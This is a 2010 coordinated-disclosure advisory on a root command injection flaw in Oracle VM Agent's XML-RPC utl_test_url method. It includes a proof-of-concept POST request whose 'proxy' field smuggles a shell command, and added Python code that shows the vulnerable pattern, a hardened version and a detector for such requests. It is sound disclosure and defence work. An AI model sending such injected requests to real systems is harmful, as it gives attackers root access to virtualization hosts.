Bonsai Information Security - Vulnerability Research

Oracle Virtual Server Agent Command Injection



1. Advisory Information

Advisory ID: BONSAI-2010-0109
Date published: 2010-10-13
Vendors contacted: Oracle
Release mode: Coordinated release


2. Vulnerability Information

Class: Injection
Remotely Exploitable: Yes
Locally Exploitable: Yes


3. Software Description

Oracle VM is server virtualization software which fully supports both Oracle and non-Oracle applications. Oracle VM offers scalable, low-cost server virtualization that is three times more efficient than existing server virtualization products from other vendors. Oracle has also announced certification of key Oracle products including Oracle Database, Oracle Fusion Middleware, Oracle Applications, and Oracle Real Application Clusters with Oracle VM.

Oracle VM Manager communicates with Oracle VM Agent to create and manage guests on an Oracle VM Server. Oracle VM Agent is installed and configured during the installation of Oracle VM Server.

By default, Oracle VM Agent runs as a highly privileged user, typically root.


4. Vulnerability Description

Injection flaws, such as SQL, OS, and LDAP injection, occur when untrusted data is sent to an interpreter as part of a command or query. The attacker’s hostile data can trick the interpreter into executing unintended commands or accessing unauthorized data.


5. Vulnerable packages

We ran our tests using Oracle Virtual Server release 2.2.0 with Oracle VM agent 2.3.


6. Non-vulnerable packages

Patch set 2.2.1 and above.

7. Credits

This vulnerability was discovered by Nahuel Grisolia ( nahuel at bonsai-sec.com ).


8. Technical Description

CVSSv2 Score: 9 (AV:N/AC:L/Au:S/C:C/I:C/A:C)

Oracle VS Agent is prone to a remote command execution vulnerability because the software fails to adequately sanitize user-supplied input.

Oracle VS Agent exposes several functions through XML-RPC. One of them, utl_test_url, receives four parameters. The second parameter, "proxy", is vulnerable to command injection: it is not properly sanitized, and its content is concatenated into an operating system command that is executed as a highly privileged user (typically root).

The following POST message can be sent to the VM Agent XML-RPC port. Doing so causes the injected ping command to be executed by the agent:


POST /RPC2 HTTP/1.0
User-Agent: XML-RPC for PHP 3.0.0.beta
authorization: Basic XXXXXXXXXXXXXXX
Host: XXX.XXX.XXX.XXX:8899
Accept-Encoding: gzip, deflate
Accept-Charset: UTF-8,ISO-8859-1,US-ASCII
Content-Type: text/xml
Content-Length: 416

<methodCall>
<methodName>utl_test_url</methodName>
<params>
<param>
<value><string>http://192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.103'; ping -c 10 localhost; '</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
<param>
<value><string>192.168.1.101</string></value>
</param>
</params>
</methodCall>
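
As an added example, not code from the advisory or from Oracle VM Agent: a constructed sketch of the concatenation flaw described above, the hardened form (an allow-listed proxy value passed as an argv list, so no shell parses it), and a check that flags utl_test_url requests carrying shell metacharacters, run over the PoC body. The command name curl and the host[:port] format expected for the proxy parameter are assumptions.

```python
import re
import subprocess
import xmlrpc.client

# Constructed sketch of the flaw the advisory describes: the untrusted
# "proxy" value is spliced into a shell command string that the agent
# runs as root. Not Oracle's code; "curl" is a stand-in for the real command.
def vulnerable_command(url: str, proxy: str) -> str:
    return "curl -x '%s' '%s'" % (proxy, url)

# Hardened form: allow-list the value (host[:port] only), then pass an argv
# list so no shell ever parses it.
_PROXY_RE = re.compile(r"[A-Za-z0-9.-]{1,253}(?::\d{1,5})?")

def validate_proxy(proxy: str) -> bool:
    """True only for a plain host[:port]; any shell metacharacter fails."""
    if not _PROXY_RE.fullmatch(proxy):
        return False
    return ":" not in proxy or int(proxy.rsplit(":", 1)[1]) <= 65535

def build_argv(url: str, proxy: str) -> list:
    if not url.startswith(("http://", "https://")):
        raise ValueError("url must be http(s)")
    if not validate_proxy(proxy):
        raise ValueError("proxy must be host[:port]")
    return ["curl", "-x", proxy, url]

def safe_test_url(url: str, proxy: str, timeout: int = 10) -> int:
    # argv list + shell=False (the default): the value can only ever be a
    # (possibly failing) proxy address, never a second command.
    return subprocess.run(build_argv(url, proxy), capture_output=True,
                          timeout=timeout).returncode

# Detection: flag utl_test_url calls whose string parameters carry shell
# metacharacters (e.g. in a captured request body or an agent log).
_SHELL_META = set(";|&`$'\"\n<>()")

def suspicious_params(xml_body: str) -> list:
    params, method = xmlrpc.client.loads(xml_body)
    if method != "utl_test_url":
        return []
    return [p for p in params if isinstance(p, str) and _SHELL_META & set(p)]

# Constructed sample: the advisory's PoC body, without the HTTP headers.
SAMPLE_REQUEST = """<methodCall><methodName>utl_test_url</methodName><params>
<param><value><string>http://192.168.1.101</string></value></param>
<param><value><string>192.168.1.103'; ping -c 10 localhost; '</string></value></param>
<param><value><string>192.168.1.101</string></value></param>
<param><value><string>192.168.1.101</string></value></param>
</params></methodCall>"""
```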


9. Report Timeline

  1. 2010-09-24: Bonsai provides vulnerability information to Oracle.
  2. 2010-09-29: Oracle confirms the vulnerability.
  3. 2010-10-12: Oracle publishes the Critical Patch Update fix.
  4. 2010-10-13: Public disclosure.


10. About Bonsai

Bonsai is a company providing professional computer information security services. Founded in early 2009 in Buenos Aires, Argentina, and currently growing soundly, we are fully committed to quality service and focused on our customers' real needs.


11. Disclaimer

The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.


12. Research

http://www.bonsai-sec.com/en/research/vulnerability.php